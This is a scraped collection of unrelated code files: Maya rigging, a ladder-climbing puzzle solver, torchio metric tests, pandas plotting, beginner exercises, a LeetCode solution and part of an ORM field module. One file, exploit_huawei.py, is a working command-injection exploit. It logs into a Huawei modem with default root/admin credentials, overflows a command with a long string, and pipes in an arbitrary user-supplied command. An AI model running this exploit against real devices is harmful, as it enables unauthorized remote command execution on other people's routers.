'n', 'xformOnCrv#'))\r\n self.turnOnPercentage= kwargs.get( 'turnOnPercentage', kwargs.get( 'top', False))\r\n\r\n self.locatorShape = kwargs.get( 'locatorShape', kwargs.get( 'shape', 'locator')) # locator, group 중 하나\r\n self.vectorShape ='group' # locator, group 중 하나\r\n\r\n #\r\n # 로케이터 회전 형식 : None, aim, orient 중하나\r\n #\r\n self.rotate = kwargs.get( 'rotate', kwargs.get( 'r', None))\r\n\r\n # 로케이터 aim축 : x, y, z, -x, -y, -z, vector 중 하나\r\n self.aimVector = self._strToVec( kwargs.get( 'aimVector', kwargs.get( 'aim', 'x')) )\r\n\r\n # 로케이터 up축 : x, y, z, -x, -y, -z, vector 중 하나\r\n self.upVector = self._strToVec( kwargs.get( 'upVector', kwargs.get( 'up', 'y')) )\r\n\r\n # 로케이터 aim축 대상 : tangent, normal, vector, object 중 하나\r\n self.worldAimType = kwargs.get( 'worldAimType', kwargs.get( 'waimt', 'tangent'))\r\n\r\n # 로케이터 up축 대상: tangent, normal, scene, vector, object, objectrotation, curverotation 중 하나\r\n self.worldUpType = kwargs.get( 'worldUpType', kwargs.get( 'wupt', 'curverotation'))\r\n\r\n self.worldAimVector = self._strToVec( kwargs.get( 'worldAimVector', kwargs.get( 'waim', 'x')) ) # x, y, z, -x, -y, -z, vector 중 하나, worldAimType 이 scene, vector 일때만 유효.\r\n self.worldUpVector = self._strToVec( kwargs.get( 'worldUpVector', kwargs.get( 'wup', 'y')) ) # x, y, z, -x, -y, -z, vector 중 하나, worldUpType 이 scene, vector 일때만 유효.\r\n self.worldAimObject = kwargs.get( 'aimObject', kwargs.get( 'wao', None)) # worldAimType 이 object, objectrotation 일때만 유효.\r\n self.worldUpObject = kwargs.get( 'worldUpObject', kwargs.get( 'wuo', None)) # worldUpType 이 object, objectrotation 일때만 유효.\r\n\r\n self.create()\r\n\r\n def create(self):\r\n ''' 로케이터 생성 '''\r\n self.positionRig()\r\n if self.rotate == 'aim':\r\n self.aimRig()\r\n elif self.rotate == 'orient':\r\n self.orientRig()\r\n\r\n pm.select( self.locator)\r\n\r\n def positionRig(self):\r\n #\r\n # 로케이터 생성\r\n #\r\n LOC = None\r\n if self.locatorShape=='locator':\r\n LOC = pm.spaceLocator( n='locOnCrv#')\r\n else:\r\n 
LOC = pm.group( n='grpOnCrv#', em=True)\r\n\r\n if self.name:\r\n LOC.rename( self.name )\r\n\r\n LOC.addAttr( 'parameter', sn='pr', dv=self.param, keyable=True )\r\n LOC.addAttr( 'turnOnPercentage', sn='top', dv=self.turnOnPercentage, at='bool', keyable=True )\r\n LOC.it.set(False)\r\n\r\n #\r\n # pointOnCurve 리깅\r\n #\r\n pntOnCrv = pm.PyNode( pm.pointOnCurve( self.curve, parameter=self.param, ch=True ) )\r\n pntOnCrv.turnOnPercentage.set(True)\r\n\r\n pntOnCrv.setAttr('parameter', keyable=True)\r\n pntOnCrv.setAttr('turnOnPercentage', keyable=True)\r\n\r\n pntOnCrv.rename( LOC+'_POC' )\r\n\r\n #\r\n # Position 리깅\r\n #\r\n LOC.parameter >> pntOnCrv.parameter\r\n LOC.turnOnPercentage >> pntOnCrv.turnOnPercentage\r\n pntOnCrv.position >> LOC.t\r\n\r\n self.locator = LOC\r\n self.pointOnCurve = pntOnCrv\r\n\r\n def aimRig(self):\r\n aimVector = self.aimVector\r\n upVector = self.upVector\r\n worldAimVector = self.worldAimVector\r\n worldUpVector = self.worldUpVector\r\n LOC = self.locator\r\n pntOnCrv = self.pointOnCurve\r\n\r\n # -------------------------------------\r\n #\r\n # aimConstraint : 생성\r\n #\r\n # -------------------------------------\r\n aimConst = pm.createNode( 'aimConstraint', p=LOC )\r\n aimConst.aimVector.set( aimVector )\r\n aimConst.upVector .set( upVector )\r\n\r\n # -------------------------------------\r\n #\r\n # aimConstraint : LOC --> aimConstraint\r\n #\r\n # -------------------------------------\r\n LOC.translate >> aimConst.constraintTranslate\r\n LOC.rotateOrder >> aimConst.constraintRotateOrder\r\n LOC.rotatePivot >> aimConst.constraintRotatePivot\r\n LOC.rotatePivotTranslate >> aimConst.constraintRotateTranslate\r\n LOC.parentInverseMatrix[0] >> aimConst.constraintParentInverseMatrix\r\n\r\n aimConst.constraintRotate >> LOC.r\r\n\r\n # 컨트르레인 어트리뷰트 잠금\r\n for attr in ['tx','ty','tz', 'rx','ry','rz', 'sx','sy','sz', 'v']:\r\n pm.setAttr( aimConst + '.' 
+ attr, keyable=False, lock=True, channelBox=False )\r\n\r\n # -------------------------------------\r\n #\r\n # aimConstraint : worldAimType\r\n #\r\n # -------------------------------------\r\n aimConst.target[0].targetWeight.set(1)\r\n\r\n if self.worldAimType=='tangent':\r\n pntOnCrv.addAttr( 'worldTangent', sn='wt', at='double3')\r\n pntOnCrv.addAttr( 'worldTangentX', sn='wtx', at='double', p='worldTangent')\r\n pntOnCrv.addAttr( 'worldTangentY', sn='wty', at='double', p='worldTangent')\r\n pntOnCrv.addAttr( 'worldTangentZ', sn='wtz', at='double', p='worldTangent')\r\n\r\n # 덧셈노드\r\n plus_wt = pm.createNode( 'plusMinusAverage', n=pntOnCrv+'_plus_worldTangent' )\r\n\r\n # 리깅\r\n pntOnCrv.position >> plus_wt.input3D[0]\r\n pntOnCrv.normalizedTangent >> plus_wt.input3D[1]\r\n plus_wt.output3D >> pntOnCrv.worldTangent\r\n\r\n pntOnCrv.worldTangent >> aimConst.target[0].targetTranslate\r\n\r\n elif self.worldAimType=='normal':\r\n pntOnCrv.addAttr( 'worldNormal', sn='wt', at='double3')\r\n pntOnCrv.addAttr( 'worldNormalX', sn='wtx', at='double', p='worldNormal')\r\n pntOnCrv.addAttr( 'worldNormalY', sn='wty', at='double', p='worldNormal')\r\n pntOnCrv.addAttr( 'worldNormalZ', sn='wtz', at='double', p='worldNormal')\r\n\r\n # 덧셈노드\r\n plus_wt = pm.createNode( 'plusMinusAverage', n=pntOnCrv+'_plus_worldNormal' )\r\n\r\n # 리깅\r\n pntOnCrv.position >> plus_wt.input3D[0]\r\n pntOnCrv.normalizedNormal >> plus_wt.input3D[1]\r\n plus_wt.output3D >> pntOnCrv.worldNormal\r\n\r\n pntOnCrv.worldNormal >> aimConst.target[0].targetTranslate\r\n\r\n elif self.worldAimType=='vector':\r\n aimConst.addAttr( 'worldAimVector', sn='wn', at='double3')\r\n aimConst.addAttr( 'worldAimVectorX', sn='wnx', at='double', p='worldAimVector')\r\n aimConst.addAttr( 'worldAimVectorY', sn='wny', at='double', p='worldAimVector')\r\n aimConst.addAttr( 'worldAimVectorZ', sn='wnz', at='double', p='worldAimVector')\r\n aimConst.worldAimVector.set(worldAimVector)\r\n\r\n # 덧셈노드\r\n plus_worldAimVec = 
pm.createNode( 'plusMinusAverage', n=pntOnCrv+'_plus_worldAimVector' )\r\n\r\n # 리깅\r\n pntOnCrv.position >> plus_worldAimVec.input3D[0]\r\n aimConst.worldAimVector >> plus_worldAimVec.input3D[1]\r\n\r\n plus_worldAimVec.output3D >> aimConst.target[0].targetTranslate\r\n\r\n elif self.worldAimType=='object':\r\n worldAimObject = pm.PyNode( self.worldAimObject )\r\n worldAimObject.translate >> aimConst.target[0].targetTranslate\r\n worldAimObject.rotatePivot >> aimConst.target[0].targetRotatePivot\r\n worldAimObject.rotatePivotTranslate >> aimConst.target[0].targetRotateTranslate\r\n worldAimObject.parentMatrix[0] >> aimConst.target[0].targetParentMatrix\r\n\r\n elif self.worldAimType=='curverotate':\r\n # mtx = pm.createNode('addMatrix')\r\n # crvTrans.worldMatrix[0] >> mtx.matrixIn[0]\r\n # crvTrans.parentMatrix[0] >> aimConst.target[0].targetParentMatrix\r\n # mtx.matrixIn[1].set( 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 1.0, type='matrix' )\r\n\r\n mtx = pm.createNode('composeMatrix')\r\n mtx = pm.createNode('decomposeMatrix')\r\n\r\n # -------------------------------------\r\n #\r\n # aimConstraint : worldUpType\r\n #\r\n # -------------------------------------\r\n if self.worldUpType=='tangent':\r\n pntOnCrv.tangent >> aimConst.worldUpVector\r\n\r\n elif self.worldUpType=='normal':\r\n pntOnCrv.normal >> aimConst.worldUpVector\r\n\r\n elif self.worldUpType=='vector':\r\n aimConst.worldUpVector.set( worldUpVector )\r\n\r\n elif self.worldUpType=='object':\r\n worldUpObject = pm.PyNode( self.worldUpObject )\r\n worldUpObject.worldMatrix[0] >> aimConst.worldUpMatrix\r\n aimConst.worldUpType.set( 1 )\r\n\r\n elif self.worldUpType=='objectrotation':\r\n worldUpObject = pm.PyNode( self.worldUpObject )\r\n worldUpObject.worldMatrix[0] >> aimConst.worldUpMatrix\r\n aimConst.worldUpType.set( 2 )\r\n\r\n elif self.worldUpType=='curverotation':\r\n self.curve.worldMatrix[0] >> aimConst.worldUpMatrix\r\n aimConst.worldUpType.set( 2 
)\r\n\r\n elif self.worldUpType=='scene':\r\n aimConst.worldUpType.set( 0 )\r\n\r\n def orientRig(self):\r\n pm.orientConstraint( self.curve, self.locator )\r\n\r\n def _strToVec( self, inputVal ):\r\n '''\r\n Abstract\r\n ========\r\n 1. 문자를 벡터형으로 리턴\r\n\r\n 2. 예제 :\r\n >> getVectorByChar( 'x' )\r\n dt.Vector([1.0, 0.0, 0.0])\r\n\r\n >> getVectorByChar( 'y' )\r\n dt.Vector([1.0, 1.0, 0.0])\r\n\r\n @param inputVal: 'x','y','z','-x','-y','-z', or vector\r\n @type inputVal: str | tuple | pm.dt.Vector\r\n\r\n @return : 입력된 캐릭터에 대응하는 벡터\r\n @rtype : pm.dt.Vector\r\n\r\n @version No 0.7\r\n '''\r\n\r\n # 입력된 값이 문자열일경우\r\n if isinstance( inputVal, str ) or isinstance( inputVal, unicode ):\r\n\r\n # 입력된 값을 앞뒤 빈칸을 없애고, 소문자로 변경\r\n inputVal = inputVal.strip().lower()\r\n\r\n # 아래 리스트에 없는 값이 들어오면 에러\r\n if not inputVal in ['x','y','z','-x','-y','-z']:\r\n raise\r\n\r\n # 매칭\r\n if inputVal.lower()== 'x': return pm.dt.Vector( 1, 0, 0)\r\n elif inputVal.lower()=='-x': return pm.dt.Vector(-1, 0, 0)\r\n elif inputVal.lower()== 'y': return pm.dt.Vector( 0, 1, 0)\r\n elif inputVal.lower()=='-y': return pm.dt.Vector( 0,-1, 0)\r\n elif inputVal.lower()== 'z': return pm.dt.Vector( 0, 0, 1)\r\n elif inputVal.lower()=='-z': return pm.dt.Vector( 0, 0,-1)\r\n\r\n else:\r\n return pm.dt.Vector( inputVal )\r\n\r\ndef locatorOnCurve(*args, **kwargs):\r\n if args:\r\n pm.select(args)\r\n\r\n locs = []\r\n for item in pm.selected(fl=True):\r\n loc = LocatorOnCurve( item, **kwargs )\r\n locs.append(loc)\r\n\r\n return locs","sub_path":"maya/rigLocatorOnCurve.py","file_name":"rigLocatorOnCurve.py","file_ext":"py","file_size_in_byte":16123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"135437179","text":"import sys\nsys.stdin = open(\"input.txt\")\n\n'''\n도착지점부터 역으로 위로 올라가면서 시작점 col idx를 찾으면 됨.\n1. 위로 가는 경우: 왼쪽이나 오른쪽이 1이 나오면 d 체인지\n2. 오른쪽으로 가는 경우: 쭉 가다가 0 나오면 위로 턴 (d: 1 -> 0)\n3. 
왼쪽으로 가는 경우: 쭉 가다가 0 나오면 위로 턴 (d: 2 -> 0)\n'''\n\n# direction 설정 (위, 오, 왼)\ndr = [-1, 0, 0]\ndc = [0, 1, -1]\n\nT = 10\nfor tc in range(1, T+1):\n t = int(input())\n # 양 끝에 벽을 세워주기 위해 0 컬럼 추가\n a = [[0] + list(map(int, input().split())) + [0] for _ in range(100)]\n\n # c: 도착점 column idx 구하기\n for j in range(102):\n if a[99][j] == 2:\n c = j\n\n # 방향 위로 초기화\n d = 0 # 0: 위, 1: 오, 2: 왼\n r = 99\n while True:\n # 반복문 계속 돌리다가 row 인덱스가 0 이 되면 끝내고 리턴\n if r == 0:\n break\n\n # 오른쪽에 1이 있으면 오른쪽으로 계속 가다가 0 나오면 반복문 종료\n if a[r][c+1]:\n d = 1\n while True:\n r += dr[d]\n c += dc[d]\n if a[r][c+1] == 0:\n break\n\n # 왼쪽에 1이 있으면 왼쪽으로 계속 가다가 0 나오면 반복문 종료\n elif a[r][c-1]:\n d = 2\n while True:\n r += dr[d]\n c += dc[d]\n if a[r][c-1] == 0:\n break\n\n # 양옆에 1 하나도 없으면 계속 직진(i.e. d=0) 또는\n # 왼쪽이든 오른쪽이든 가다가 next col에서 0이면 d=0(위)로 체인지\n d = 0\n r += dr[d]\n c += dc[d]\n\n print(\"#{} {}\".format(t, c-1))\n\n","sub_path":"src/swea/1210/sol1.py","file_name":"sol1.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"175247172","text":"import argparse\nimport socket\nimport time\nimport sys\n\n\ndef check_partern(sock, p):\n curtime = time.time()\n while (time.time() - curtime) <= 5:\n data = sock.recv(1024)\n if p in data:\n return True\n print(\"false to receive parten: \", p)\n print(\"attack terminated !!!!!!\")\n sys.exit(1)\n\n\nclass PesudoConn:\n def __init__(self, target_ip, target_port):\n self.target_ip = target_ip\n self.target_port = target_port\n self.s = None\n\n def send(self, cmd):\n g_victim_ip = self.target_ip\n g_victim_port = int(self.target_port)\n g_command = cmd\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.s.connect((g_victim_ip, g_victim_port))\n self.s.sendall(b'\\nroot\\n')\n check_partern(self.s, \"assword\")\n self.s.sendall(b'admin\\n')\n check_partern(self.s, \"WAP\")\n self.s.sendall(b\"su\\n\")\n check_partern(self.s, \"WAP\")\n 
self.s.sendall(b'shell\\n')\n check_partern(self.s, \"WAP\")\n self.s.sendall(\n b'exittttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt\\r\\n')\n _ = self.s.recv(1024)\n # print(data)\n time.sleep(0.1)\n self.s.sendall(b'|' + g_command + ' \\r\\n\\r\\n')\n time.sleep(0.5)\n pass\n\n def recv(self, _):\n data = self.s.recv(1024)\n if len(data) > 0:\n p = data.find(\"File name too long\\r\\n\")\n data = data[p + 20:]\n p = data.find(\"WAP\")\n data = data[:p]\n self.s.close()\n return data\n return \"\"\n\n def close(self):\n pass\n\n\ndef exploit_func(target_ip, target_port):\n conn = PesudoConn(target_ip=target_ip,\n target_port=target_port)\n return conn\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Huawei exploit')\n parser.add_argument('-i','--ip', help='IP of victim\\'s modem',required=True, dest='victim_ip')\n parser.add_argument('-p','--port',help='Port of victim\\'s modem', required=True, dest='victim_port')\n parser.add_argument('-c','--command',help='command to execute', required=True, dest='command')\n\n args = parser.parse_args()\n\n g_victim_ip = args.victim_ip\n g_victim_port = int(args.victim_port)\n g_command = args.command\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((g_victim_ip, g_victim_port))\n s.sendall(b'\\nroot\\n')\n check_partern(s,\"assword\")\n s.sendall(b'admin\\n')\n check_partern(s,\"WAP\")\n s.sendall(b\"su\\n\")\n check_partern(s,\"WAP\")\n s.sendall(b'shell\\n')\n check_partern(s,\"WAP\")\n 
s.sendall(b'exittttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt\\r\\n')\n _ = s.recv(1024)\n # print(data)\n time.sleep(0.1)\n s.sendall(b'|' + g_command + ' \\r\\n\\r\\n')\n time.sleep(0.5)\n data = s.recv(1024)\n p = data.find(\"File name too long\\r\\n\")\n data = data[p + 20:]\n p = data.find(\"WAP\")\n data = data[:p]\n # print('Received: \\n', data)\n print(data)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"exploits/exploit_huawei.py","file_name":"exploit_huawei.py","file_ext":"py","file_size_in_byte":3966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"311319321","text":"from torchio import Subject, Image, ImagesDataset\nfrom torchio.transforms import RandomMotionFromTimeCourse\nfrom torchio.metrics import SSIM3D, MetricWrapper, MapMetricWrapper\nfrom torchio.metrics.ssim import functional_ssim\nfrom torch.nn import MSELoss, L1Loss\nimport torch\nfrom nibabel.viewers import OrthoSlicer3D as ov\n\nt1_path = \"/data/romain/HCPdata/suj_100307/T1w_acpc_dc_restore.nii\"\nmask_path = \"/data/romain/HCPdata/suj_100307/cat12/fill_mask_head.nii.gz\"\ndataset = ImagesDataset([\n Subject({\n \"T1\": Image(t1_path),\n \"mask\": Image(mask_path, type=\"mask\"),\n \"mask2\": Image(mask_path, type=\"mask\")\n })])\n\nmetrics = {\n \"L1\": MetricWrapper(\"L1\", L1Loss()),\n \"L1_map\": MapMetricWrapper(\"L1_map\", lambda x, y: torch.abs(x-y), average_method=\"mean\", mask_keys=['mask2']),\n \"L2\": MetricWrapper(\"L2\", MSELoss()),\n #\"SSIM\": 
SSIM3D(average_method=\"mean\"),\n \"SSIM_mask\": SSIM3D(average_method=\"mean\", mask_keys=[\"mask\", \"mask2\"]),\n \"SSIM_Wrapped\": MetricWrapper(\"SSIM_wrapped\", lambda x, y: functional_ssim(x, y, return_map=False), use_mask=True, mask_key=\"mask\"),\n \"ssim_base\": MetricWrapper('SSIM_base', ssim3D)\n}\n\nmotion_trsfm = RandomMotionFromTimeCourse(verbose=True, compare_to_original=True, metrics=metrics,\n oversampling_pct=0.0)\n\ndataset.set_transform(motion_trsfm)\n\ntf = dataset[0]\ncomputed_metrics = tf[\"T1\"][\"metrics\"]\nprint(\"Computed metrics: {}\".format(computed_metrics))\n\nov(tf['T1']['data'].squeeze().numpy())\n","sub_path":"notebooks/tests_metrics.py","file_name":"tests_metrics.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"310936717","text":"import codecademylib\r\nimport pandas as pd\r\nfrom matplotlib import pyplot as plt\r\n\r\nspecies = pd.read_csv('species_info.csv')\r\nspecies['is_sheep'] = species.common_names.apply(lambda x: 'Sheep' in x)\r\nsheep_species = species[(species.is_sheep) & (species.category == 'Mammal')]\r\n\r\nobservations = pd.read_csv('observations.csv')\r\n\r\nsheep_observations = observations.merge(sheep_species)\r\n\r\nobs_by_park = sheep_observations.groupby('park_name').observations.sum().reset_index()\r\n\r\nplt.figure(figsize =(16,4))\r\nplt.bar(range(len(obs_by_park['park_name'])), obs_by_park['observations'])\r\nax = plt.subplot()\r\nax.set_xticks(range(len(obs_by_park['park_name'])))\r\nax.set_xticklabels(obs_by_park['park_name'])\r\n\r\nplt.title('Observations of Sheep per Week')\r\nplt.xlabel('Park Name')\r\nplt.ylabel('Number of Observations')\r\nplt.savefig('Observations_by_Parks.png')\r\nplt.show()","sub_path":"Capstone - Biodiversity/Sheep Sightings.py","file_name":"Sheep 
Sightings.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"252023880","text":"# -*- coding: utf-8 -*-\nimport math\n\n#COMECE SEU CODIGO AQUI\na=int(input('digite o valor: '))\n\nc20= a//20\na= a%20\nc10= a//10\na= a%10\nc5= a//5\na= a%5\nc2= a//2\na= a%2\nc1= a//1\n\nprint(c20)\nprint(c10)\nprint(c5)\nprint(c2)\nprint(c1)","sub_path":"moodledata/vpl_data/154/usersdata/269/65460/submittedfiles/atm.py","file_name":"atm.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"330229660","text":"list_1 = []\r\nlist_2 = []\r\n\r\n\r\ndef mass_keys():\r\n str = []\r\n while (True):\r\n word = input()\r\n if word == \"quit\":\r\n break\r\n else:\r\n str.append(c)\r\n return str\r\n\r\n\r\ndef mass_values(str):\r\n str_3 = []\r\n for i in range(len(str)):\r\n word = input()\r\n str_3.append(word)\r\n return str_3\r\n\r\n\r\ndef multipl(str_3, str):\r\n summ = {str[i]: str_3[i] for i in range(len(str))}\r\n return summ\r\n\r\n\r\nprint(\"Для выхода из цикла введите - quit\")\r\nlist_1 = mass_keys()\r\n\r\nmultiplicity = set(list_1)\r\nprint(\"список -\", list_1)\r\nprint(\"множество - \", multiplicity)\r\nprint(\"количество символов в списке =\", len(list_1))\r\nprint(\"заполните следующий список из\", len(list_1), \"символов\")\r\n\r\nlist_2 = mass_values(list_1)\r\n\r\nprint(list_2)\r\nlist = multipl(list_2, list_1)\r\nprint(list)\r\n","sub_path":"Project_6.1.py","file_name":"Project_6.1.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"178574837","text":"# You are given two non-empty linked lists representing two non-negative integers.\n# The digits are stored in reverse order, and each of their nodes contains a single digit.\n# Add the two numbers and return the sum as a linked 
list.\n\n# You may assume the two numbers do not contain any leading zero, except the number 0 itself.\n\n\n# Example 1:\n\n# Input: l1 = [2,4,3], l2 = [5,6,4]\n# Output: [7,0,8]\n# Explanation: 342 + 465 = 807.\n\n# Example 2:\n\n# Input: l1 = [0], l2 = [0]\n# Output: [0]\n\n# Example 3:\n\n# Input: \n# l1 = [9,9,9,9,9,9,9], \n# l2 = [9,9,9,9]\n# Output: \n# [8,9,9,9,0,0,0,1]\n\n\n# Constraints:\n\n# The number of nodes in each linked list is in the range [1, 100].\n# 0 <= Node.val <= 9\n# It is guaranteed that the list represents a number that does not have leading zeros.\n# =============================================================================\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n \nclass Solution:\n def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n \n answer = ListNode()\n currentNode = answer\n \n carry = 0\n while l1 or l2 or carry:\n # initialize current values, use default 0 if None\n value1 = l1.val if l1 else 0\n value2 = l2.val if l2 else 0\n \n # add values and update the carry\n sum = value1 + value2 + carry\n carry = sum // 10\n # create a new node, with the mod value of the sum\n currentNode.next = ListNode(sum % 10)\n \n # move current node to its next node\n currentNode = currentNode.next\n \n # move l1 and l2 to their next respective nodes, or set to None if they're at the end\n l1 = l1.next if l1 else 0\n l2 = l2.next if l2 else 0\n \n return answer.next\n \n \n\n\n# Explainer\n# \n# Edge cases to consider. What if one list has more values than the other? Use a zero.\n# \n# For each value in the list, add it to the sum. 
If the sum is greater than 10, \n# we can use floor division to get the remainder., and carry that value over to the next digit.\n# Now, we can create \n\n","sub_path":"leetcode/0002-AddTwoNumbers.py","file_name":"0002-AddTwoNumbers.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"607055557","text":"import json\nimport re\n\nfrom decimal import Decimal\nfrom uuid import UUID\nfrom json.decoder import JSONDecodeError\n\nfrom datetime import datetime, date, time\nfrom ..exceptions import FieldError # , ModuleError\n\nDATE_FIELDS = ['DateField', ]\n\nKWARGS_TYPES = {\n 'db_column': str,\n 'uuid_type': str,\n 'default': object,\n 'null': bool,\n 'max_length': int,\n 'foreign_key': str,\n 'auto_now': bool,\n 'reverse_field': str,\n 'choices': (dict, tuple),\n 'unique': bool,\n 'strftime': str,\n 'max_digits': int,\n 'decimal_places': int,\n}\n\n\nclass Field(object):\n required_kwargs = []\n table_name = None\n\n def __init__(self, **kwargs):\n self.validate_kwargs(kwargs)\n self.field_type = self.__class__.__name__\n\n for kw in kwargs.keys():\n setattr(self, kw, kwargs.get(kw))\n if kw == 'choices':\n if isinstance(kwargs.get(kw), dict):\n self.choices = kwargs.get(kw)\n elif kwargs.get(kw) is None:\n pass\n else:\n self.choices = {k: v for k, v in kwargs.get(kw)}\n\n def creation_query(self):\n creation_string = '{db_column} ' + self.creation_string\n date_field = self.field_type in DATE_FIELDS\n\n creation_string += self.null and ' NULL' or ' NOT NULL'\n\n if hasattr(self, 'default') and self.default is not None:\n creation_string += ' DEFAULT '\n default_value = self.default\n if callable(self.default):\n default_value = self.default()\n\n if isinstance(default_value, str):\n creation_string += '\\'{}\\''.format(default_value)\n elif isinstance(default_value, bool):\n creation_string += str(default_value)\n else:\n creation_string += '\\'{}\\''.format(\n 
self.sanitize_data(default_value)\n )\n\n elif date_field and self.auto_now:\n creation_string += ' DEFAULT now()'\n\n if self.unique:\n creation_string += ' UNIQUE'\n\n return creation_string.format(**self.__dict__)\n\n #######################################################\n #######################################################\n # def modificate_query(self):\n # modificate_string = '{db_column} ' + self.modificate_string\n # date_field = self.field_type in DATE_FIELDS\n\n # modificate_string += self.null and ' NULL' or ' NOT NULL'\n\n # if hasattr(self, 'default') and self.default is not None:\n # modificate_string += ' DEFAULT '\n # default_value = self.default\n # if callable(self.default):\n # default_value = self.default()\n\n # if isinstance(default_value, str):\n # modificate_string += '\\'{}\\''.format(default_value)\n # elif isinstance(default_value, bool):\n # modificate_string += str(default_value)\n # else:\n # modificate_string += '\\'{}\\''.format(\n # self.sanitize_data(default_value)\n # )\n\n # elif date_field and self.auto_now:\n # modificate_string += ' DEFAULT now()'\n\n # if self.unique:\n # modificate_string += ' UNIQUE'\n\n # return modificate_string.format(**self.__dict__)\n #######################################################\n #######################################################\n\n def validate_kwargs(self, kwargs):\n for kw in self.required_kwargs:\n if not kwargs.get(kw, None):\n raise FieldError(\n '\"{class_name}\" field requires {kw}'.format(\n class_name=self.__class__.__name__,\n kw=kw,\n )\n )\n\n for k, v in kwargs.items():\n null_choices = v is None and k == 'choices'\n if not isinstance(v, KWARGS_TYPES[k]) and not null_choices:\n raise FieldError('Wrong value for {k}'.format(k=k))\n\n if kwargs.get('db_column', ''):\n self.set_field_name(kwargs['db_column'])\n\n def validate(self, value):\n if value is None and not self.null:\n raise FieldError('null value in NOT NULL field')\n\n if hasattr(self, 'choices') and 
self.choices is not None:\n if value not in self.choices.keys():\n raise FieldError('\"{}\" not in model choices'.format(value))\n\n if not isinstance(value, self.internal_type):\n raise FieldError(\n '{} is a wrong datatype for field {}'.format(\n value, self.__class__.__name__\n )\n )\n\n @classmethod\n def recompose(cls, value):\n return value\n\n def sanitize_data(self, value):\n '''method used to convert to SQL data'''\n if value is None:\n return 'NULL'\n self.validate(value)\n return value\n\n def serialize_data(self, value):\n '''to directly serialize the data field based'''\n return value\n\n def current_state(self):\n return {arg: getattr(self, arg) for arg in self.args}\n\n # def make_migration(self, old_state):\n # if old_state is None:\n # return self.creation_query()\n\n # current_state = self.current_state()\n\n # if set(old_state.keys()) != set(current_state.keys()):\n # raise ModuleError(\n # 'imposible to migrate, you should do that manually!'\n # )\n\n # difference = {}\n # for key in self.args:\n\n # if current_state[key] != old_state[key]:\n # difference.update({key: current_state[key]})\n\n # return difference or None\n\n def set_field_name(self, db_column):\n if '__' in db_column:\n raise FieldError('db_column can not contain \"__\"')\n if db_column.startswith('_'):\n raise FieldError('db_column can not start with \"_\"')\n if db_column.endswith('_'):\n raise FieldError('db_column can not end with \"_\"')\n self.db_column = db_column\n\n\nclass PkField(Field):\n internal_type = int\n creation_string = 'serial primary key'\n args = ('db_column', 'unique', 'null',)\n\n def __init__(self, db_column='id', null=False):\n super().__init__(db_column=db_column, unique=True, null=null)\n\n\nclass Uuid4Field(Field):\n internal_type = UUID\n args = ('db_column', 'unique', 'null', 'uuid_type')\n\n def __init__(\n self, db_column='', null=False, uuid_type='v4'):\n self.field_requirement = 'CREATE EXTENSION IF NOT EXISTS \"uuid-ossp\";'\n\n if uuid_type 
not in ['v1', 'v4']:\n raise FieldError('{} is not a recognized type'.format(uuid_type))\n\n super().__init__(\n db_column=db_column, unique=True, default=None, null=null,\n uuid_type=uuid_type\n )\n\n @property\n def creation_string(self):\n uuid_types = {\n 'v1': 'uuid_generate_v1mc',\n 'v4': 'uuid_generate_v4',\n }\n return 'UUID DEFAULT {}()'.format(uuid_types[self.uuid_type])\n\n\nclass BooleanField(Field):\n internal_type = bool\n creation_string = 'boolean'\n args = ('db_column', 'default', 'null', 'unique', )\n\n def __init__(self, db_column='', default=None, null=False, unique=False):\n super().__init__(db_column=db_column, default=default,\n null=null, unique=unique\n )\n\n def sanitize_data(self, value):\n '''method used to convert to SQL data'''\n if value is None:\n return 'NULL'\n elif value is True:\n return 'true'\n elif value is False:\n return 'false'\n\n\nclass CharField(Field):\n internal_type = str\n required_kwargs = ['max_length', ]\n creation_string = 'varchar({max_length})'\n args = ('db_column', 'default', 'max_length', 'null', 'choices', 'unique')\n\n def __init__(self, db_column='', default=None, max_length=0,\n null=False, choices=None, unique=False\n ):\n super().__init__(db_column=db_column, default=default,\n max_length=max_length, null=null, choices=choices,\n unique=unique\n )\n\n def sanitize_data(self, value):\n value 